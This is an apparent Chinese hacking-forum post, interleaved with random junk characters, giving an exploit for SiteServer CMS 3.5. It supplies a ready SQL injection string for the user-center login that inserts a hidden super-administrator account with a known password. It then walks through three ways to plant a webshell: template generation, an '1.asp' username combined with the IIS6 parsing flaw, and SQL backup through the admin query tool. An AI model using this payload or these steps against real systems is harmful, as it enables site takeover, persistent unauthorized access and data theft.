经测试秒杀最新的3.5版/ s$ x" j* ~# O" V, O
6 \1 e7 R) n3 b( h7 h# H; \5 {stieserver官网:www.siteserver.cn
/ I$ _( ?- a9 k6 U/ u$ L# F* Z5 z0 w0 @5 e. z1 O' N2 }8 A6 a
3 D6 K5 u' b7 |2 m5 Z" y/ H
4 O7 F1 J. N( c9 Q- S L( c
EXP:1 c% F: @+ Z0 I$ X7 D/ I
, @+ z+ o X1 O0 q. Q
直接访问UserCenter/login.aspx4 c7 n# X' C+ j5 _# W8 O) e+ ?
y+ q: {! c1 X- Z$ q
) ]6 i4 h J4 @. H& Z
" t- J: a6 Z7 q用户名处输入:7 q6 D: v; _$ N: @4 U( M% j
. a" R! t' e8 Y3 M6 B0 c0 b
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
! P8 \* H! t! U# X' c; }: N; B4 R& y3 E# _
" {* y( F# N& n( |/ b- v
4 m+ }/ ~5 ]9 y* m3 M/ a+ D9 ]
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。1 C+ k1 A9 [4 ~" S" ~% s/ U, h
6 V- i! X) ~9 z; S( z
( a3 C0 i. l' Z, P4 w- Y
+ X3 D, } L9 U) H& w, W/ Y% ?
之后再访问后台SiteServer/login.aspx用插入的用户登陆) h- \6 [* {' |/ t* Y
. h# q9 H4 Q' W- K3 k4 ? ! }. q6 q1 G- H. F
" w+ h* [ Z/ ]( R6 v后台拿webshell的三种方法:
* A* W4 X' G f R$ y& ~# [! S
7 H9 \8 d& @2 l/ v. z8 e2 F一、) r# x! R/ `4 l
# |8 a I4 _! i- }- K0 V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 L) e2 m: T& M7 m8 [2 ?, U
' g& K; z$ \2 U! h* E7 F/ F二、
# Z5 f% W2 Z0 C8 |; j( m0 G% L! A% x X$ R
成员权限-》添加用户-》用户名为:1.asp
' w8 O+ P5 }9 w0 B
/ U& e* ~/ d* f* z* Ohttp://127.0.0.1/usercenter/" p$ W4 a6 ~" h% i- w5 ~3 o
1 _ l% s& s }用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell k- ^' W! [: {0 h) u! I
+ p8 o$ n: g+ O3 |4 w
(ps:后台添加用户时不会验证是否含有非法字符)( D2 g8 J0 N4 m$ I- Y
8 I4 ]7 u& |& P: w& e: E8 R* N
三、4 Y( K7 N# P: A9 ]8 @. ~
7 p0 H: v, K }! P* t系统工具-》实用工具-》机器参数查看
% V6 K' v Q+ S: A, W) {- W( ?5 k可以看到数据库类型、名称,WEB路径
' {5 @+ n# o3 ]9 B5 @2 G" `. w- |* C) y( t8 w
系统工具-》数据库工具-》SQL语句查询" D1 o/ s* T) v/ j6 @% H5 c$ s
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。- ]* e3 Q" x, {, k+ |4 i+ z/ q0 M
: r" j! X* y2 v! @+ i |